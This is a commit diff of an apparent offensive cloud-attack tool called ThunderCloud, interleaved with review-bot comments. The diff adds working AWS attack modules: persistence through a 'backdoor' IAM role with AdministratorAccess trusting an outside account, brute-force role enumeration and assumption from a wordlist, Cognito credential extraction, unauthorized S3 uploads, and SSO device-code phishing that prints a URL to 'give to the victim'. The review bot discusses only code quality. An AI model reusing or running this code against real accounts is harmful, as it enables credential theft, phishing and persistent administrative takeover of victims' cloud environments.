Projects STRLCPY ThunderCloud Commits b52fceb4
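--- a/clouds/aws/assume.py
+++ b/clouds/aws/assume.py
@@ -1 +0,0 @@
-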
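--- a/clouds/aws/backdoor.py
+++ b/clouds/aws/backdoor.py
@@ -0,0 +1,39 @@
+import boto3
+import json
+import time
+ 
+class backdoor:
+ pass
+ 
+ def attack(self, role, key, secret, account_id):
+ iam = boto3.client("iam",
+ aws_access_key_id= key,
+ aws_secret_access_key=secret,
+ region_name="us-east-2")
+ assume_role_policy_document = json.dumps({
+ "Version": "2012-10-17",
+ "Statement": [
+ {
+ "Effect": "Allow",
+ "Action": "sts:AssumeRole",
+ "Principal": {
+ "AWS": account_id
+ },
+ "Condition": {}
+ }
+ ]
+ })
+ 
+ response = iam.create_role(
+ RoleName=role,
+ AssumeRolePolicyDocument=assume_role_policy_document
+ )
+ 
+ role_name = response["Role"]["RoleName"]
+ time.sleep(5)
+ response = iam.attach_role_policy(
+ RoleName=role_name,
+ PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
+ )
+ print("Backdoor role with Administrator access created - %s" %role_name)
+ 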
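Review bot: `attack` creates a role and attaches `AdministratorAccess` to it (lines 27–37) but the module has no teardown, so nothing created here can be removed through the tool; add a docstring on `attack` stating that the role and its policy attachment persist in the target account until they are detached and deleted manually. The `time.sleep(5)` on line 33 is an unexplained delay — `# wait for the new role to propagate before attaching a policy — TODO confirm this is needed` would record the intent. The IAM client is pinned to `region_name="us-east-2"` on line 12 even though `tc.py` now accepts `--region`; a one-line comment saying why the argument is not used here would avoid the question. Style: `class backdoor` should be `Backdoor`, and the second assignment to `response` on line 34 is never read.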
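--- a/clouds/aws/cognito.py
+++ b/clouds/aws/cognito.py
@@ -7,11 +7,10 @@
 class Cognito:
  pass
  
- def attack(self):
- client = boto3.client('cognito-identity', region_name="us-east-2")
- 
+ def attack(self, ce, region):
+ client = boto3.client('cognito-identity', region_name=region)
  try:
- _id = client.get_id(IdentityPoolId="us-east-2:242fadac-86fa-4afb-9a48-83a546572559")
+ _id = client.get_id(IdentityPoolId=region + ':' + ce)
  except client.exceptions.NotAuthorizedException as e:
  fail_message = "Bla Bla: {}".format(e)
  print(fail_message)
@@ -25,5 +24,7 @@
  session_token = credentials['Credentials']['SessionToken']
  identity_id = credentials['IdentityId']
  
- print(access_key, secret_key, session_token)
+ print("Access key - ", access_key)
+ print("Secret key -", secret_key)
+ print("Session token -", session_token)
  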
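Review bot: `region + ':' + ce` on new line 13 raises `TypeError` when `--region` is omitted, because `tc.py` declares that argument without `required=True` or a default and `args.region` arrives here as `None`; validate it at the top of `attack`, e.g. `if not region: raise ValueError("region is required")`. The placeholder `"Bla Bla: {}"` on context line 15 is user-facing output; replace it with a descriptive message such as `"get_id was not authorized: {}"`. Both hunks are inside `attack`, which continues in the skipped lines between them and after the second hunk.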
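--- a/clouds/aws/enum.py
+++ b/clouds/aws/enum.py
@@ -1 +1,38 @@
+import boto3
+import botocore
+ 
+class EnumRoles:
+ pass
+ def attack(self, account_id, key, secret):
+ 
+ file = "./wordlist/word_list.txt"
+ with open(file, 'r') as f:
+ word_list = f.read().splitlines()
+ 
+ client = boto3.client('sts',aws_access_key_id= key,
+ aws_secret_access_key=secret)
+ print("Starting enumeration on account_id %s" %(account_id))
+ 
+ for word in word_list:
+ role_arn = 'arn:aws:iam::%s:role/%s' %(account_id, word)
+ try:
+ response = client.assume_role(
+ RoleArn=role_arn,
+ RoleSessionName='test',
+ DurationSeconds=43200
+ )
+ 
+ except botocore.exceptions.ClientError as error:
+ if 'The requested DurationSeconds exceeds the MaxSessionDuration set for this role.' in str(error):
+ response = client.assume_role(
+ RoleArn=role_arn,
+ RoleSessionName='test',
+ DurationSeconds=3600
+ )
+ print("Succesful assumed the role %s" %(role_arn))
+ break
+ elif 'Not authorized to perform sts:AssumeRole' in str(error):
+ pass
+ elif 'is not authorized to perform: sts:AssumeRole on resource' in str(error):
+ print("Found restricted role but not allowed to assume %s" %(role_arn))
  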
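Review bot: The `except` branch on lines 25–37 dispatches on substrings of the exception text, which is brittle across SDK versions and message changes; compare the structured code in `error.response['Error']['Code']` and keep `str(error)` for logging only. A `ClientError` whose message matches none of the three branches is silently discarded, which hides real failures (throttling, expired credentials) from the operator. On line 8 `file` shadows a builtin and the wordlist path is resolved relative to the current working directory rather than the module, so running `tc.py` from another directory raises `FileNotFoundError`. A docstring on `attack` should state that it reads `./wordlist/word_list.txt` and issues one `sts:AssumeRole` call per entry, since neither is visible from the signature.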
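--- a/clouds/aws/s3.py
+++ b/clouds/aws/s3.py
@@ -1 +1,27 @@
+import boto3
+class s3bucket:
+ pass
+ 
+ def attack(self, bucket_name, key, secret):
+ session = boto3.Session(
+ aws_access_key_id=key,
+ aws_secret_access_key=secret,
+ )
+ 
+ s3 = session.resource('s3')
+ 
+ object = s3.Object(bucket_name, 'vuln_file_name.txt')
+ 
+ txt_data = b'This is a test file to check for misconfiguration'
+ 
+ try:
+ result = object.put(Body=txt_data)
+ res = result.get('ResponseMetadata')
+ 
+ if res.get('HTTPStatusCode') == 200:
+ print('File Uploaded Successfully')
+ else:
+ print('File Not Uploaded')
+ except:
+ print("Either the bucket does not exist or Access Denied")
  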
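Review bot: The bare `except:` on line 25 swallows every exception, including `KeyboardInterrupt` and programming errors, and discards the reason; narrow it to `except Exception as error:` (or `botocore.exceptions.ClientError` with the matching import) and include `error` in the printed message. `object` on line 13 shadows a builtin, and `res.get(...)` on line 21 raises `AttributeError` if `ResponseMetadata` is missing, which the bare except then misreports as "Access Denied". The module also writes `vuln_file_name.txt` into the bucket and never removes it; document that side effect in a docstring on `attack` so an engagement can clean up afterwards.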
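--- a/clouds/aws/sso.py
+++ b/clouds/aws/sso.py
@@ -6,22 +6,21 @@
  
 class AWSSSO:
  pass
- def attack(self):
- region = "us-east-2"
- url = "https://something.awsapps.com"
+ def attack(self, url, region):
  sso_oidc = boto3.client('sso-oidc', region_name= region)
  client = sso_oidc.register_client(
- client_name = 'thundercloud',
- client_type = 'public'
+ clientName = 'thundercloud',
+ clientType = 'public'
  )
  client_id = client.get('clientId')
  client_secret = client.get('clientSecret')
  authz = sso_oidc.start_device_authorization(
  clientId = client_id,
- client_secret = client_secret,
+ clientSecret = client_secret,
  startUrl = url
  )
  url = authz.get('verificationUriComplete')
  deviceCode = authz.get('deviceCode')
  print(client_id, client_secret, deviceCode)
- print("Give this URL to the victim" + url)
+ print("Give this URL to the victim\n" + url)
+ 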
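Review bot: The `url` parameter is reassigned on context line 22 (`url = authz.get('verificationUriComplete')`) after it has already been passed as `startUrl` on line 20, so one name holds two different URLs inside the function; bind the second to its own name, `verification_url = authz.get('verificationUriComplete')`, and use that in the print on line 25. Line 24 prints `client_secret` from `register_client` to stdout together with `client_id` and `deviceCode`; unless the operator needs the secret, keep it out of the console output. `attack` has no error handling around the two `sso_oidc` calls, so a failed registration surfaces as an unhandled `ClientError` rather than a message.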
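--- a/tc.py
+++ b/tc.py
@@ -2,42 +2,51 @@
  
 def main():
  """Main function"""
+ print('''
+ _______ _ _ _____ _ _
+ |__ __| | | | / ____| | | |
+ | | | |__ _ _ _ __ __| | ___ _ __| | | | ___ _ _ __| |
+ | | | '_ \| | | | '_ \ / _` |/ _ \ '__| | | |/ _ \| | | |/ _` |
+ | | | | | | |_| | | | | (_| | __/ | | |____| | (_) | |_| | (_| |
+ \_/ |_| |_|\__,_|_| |_|\__,_|\___|_| \_____|_|\___/ \__,_|\__,_|
+ 
+ ''')
  parser = argparse.ArgumentParser(description='Attack modules of cloud AWS')
  parser.add_argument('-ce', '--cognito_endpoint', help='to verify if cognito endpoint is vulnerable '
  'and to extract credentials')
+ parser.add_argument('-reg', '--region',help='AWS region of the resource')
+ parser.add_argument('-accid', '--aws_account_id', help='AWS account of the victim')
+ parser.add_argument('-aws_key', '--aws_access_key', help= 'AWS access keys of the victim account')
+ parser.add_argument('-aws_secret', '--aws_secret_key', help='AWS secret key of the victim account')
+ parser.add_argument('-bdrole', '--backdoor_role', help='Name of the backdoor role in victim role')
  parser.add_argument('-sso', '--sso_url', help='AWS SSO URL to phish for AWS credentials')
- parser.add_argument('-enum-roles', '--enumerate_roles', help='To enumerate account roles in victim AWS roles')
- parser.add_argument('-s3', '--s3_bucket_name', help='Execute 7 attacks on S3 bucket')
- parser.add_argument('-asum_role', '--assume_role', help='Privilege escalation for assuming roles')
+ parser.add_argument('-enum_roles', '--enumerate_roles', help='To enumerate and assume account roles in victim AWS roles')
+ parser.add_argument('-s3', '--s3_bucket_name', help='Execute upload attack on S3 bucket')
  parser.add_argument('-conn_string', '--connection_string', help='Azure Shared Access key for reading'
  'servicebus/queues/blobs etc')
  parser.add_argument('-blob', '--blob', help='Azure blob enumeration')
- parser.add_argument()
+ parser.add_argument('-shared_access_key', '--shared_access_key', help='Azure shared key')
  args = parser.parse_args()
  if args.cognito_endpoint:
  from clouds.aws.cognito import Cognito
  attack_cognito = Cognito()
- attack_cognito.attack()
+ attack_cognito.attack(args.cognito_endpoint, args.region)
  elif args.sso_url:
  from clouds.aws.sso import AWSSSO
  attack_sso = AWSSSO()
- attack_sso.attack()
+ attack_sso.attack(args.sso_url, args.region)
  elif args.enumerate_roles:
  from clouds.aws.enum import EnumRoles
  attack_roles = EnumRoles()
- attack_roles.attack()
+ attack_roles.attack(args.enumerate_roles, args.aws_access_key, args.aws_secret_key)
  elif args.s3_bucket_name:
- from clouds.aws.s3 import S3
- attack_s3 = S3()
- attack_s3.attack()
- elif args.assume_role:
- from clouds.aws.assume import AsumRole
- attack_roles = AsumRole()
- attack_roles.attack()
- elif args.shared_access_key:
- from clouds.azure.keys import ConnectionString
- attack_keys = ConnectionString()
- attack_keys.attack()
+ from clouds.aws.s3 import s3bucket
+ attack_s3 = s3bucket()
+ attack_s3.attack(args.s3_bucket_name, args.aws_access_key, args.aws_secret_key)
+ elif args.backdoor_role:
+ from clouds.aws.iambackdoor import backdoor
+ attack_role = backdoor()
+ attack_role.attack(args.backdoor_role, args.aws_access_key, args.aws_secret_key, args.aws_account_id)
  elif args.blob:
  from clouds.azure.blob import Blob
  attack_blob = Blob()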
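Review bot: The new `--shared_access_key` argument on line 28 is dead: its only consumer, the `elif args.shared_access_key:` branch that imported `clouds.azure.keys`, is removed in the same hunk, so passing the flag now silently does nothing; either keep the branch or drop the argument. `--region`, `--aws_access_key`, `--aws_secret_key` and `--aws_account_id` are all optional with no default, yet every new branch forwards them unchecked, so a missing value surfaces as a `TypeError` or a boto3 credential error inside the module instead of an argparse usage message; validate the required combination for the selected branch before dispatching. Accepting the access key and secret as command-line arguments also leaves them in shell history and process listings; reading them from the environment or the standard AWS credential chain would be the safer default. `main` continues past the end of the hunk.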
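--- a/wordlist/word_list.txt
+++ b/wordlist/word_list.txt
@@ -0,0 +1,11 @@
+AdminAccess
+sysadministrator
+systemadmin
+systemadministrator
+devops
+systemsmanager
+server
+service
+networkadmin
+networkadministrator
+ 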